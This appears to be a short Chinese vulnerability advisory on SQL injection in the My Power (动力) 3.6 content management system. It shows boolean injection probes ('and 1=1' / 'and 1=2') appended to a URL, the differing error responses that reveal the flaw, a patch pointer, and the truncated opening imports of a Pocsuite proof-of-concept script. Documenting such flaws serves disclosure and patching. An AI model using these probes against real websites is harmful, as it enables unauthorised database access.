动力(My Powe)SQL注射漏洞

就是当用％20and%201=1返回如下： 错误信息 产生错误的可能原因：· 请指定文章ID 返回上一页 当用%20and%201=2返回如下： 错误信息 产生错误的可能原因： 你要找的文章不存在，或者已经被管理员删除！ 返回上一页 进行SQL注射 动力My Power3.6版 下载官方最新补丁http://www.asp163.net !/usr/bin/env python coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from...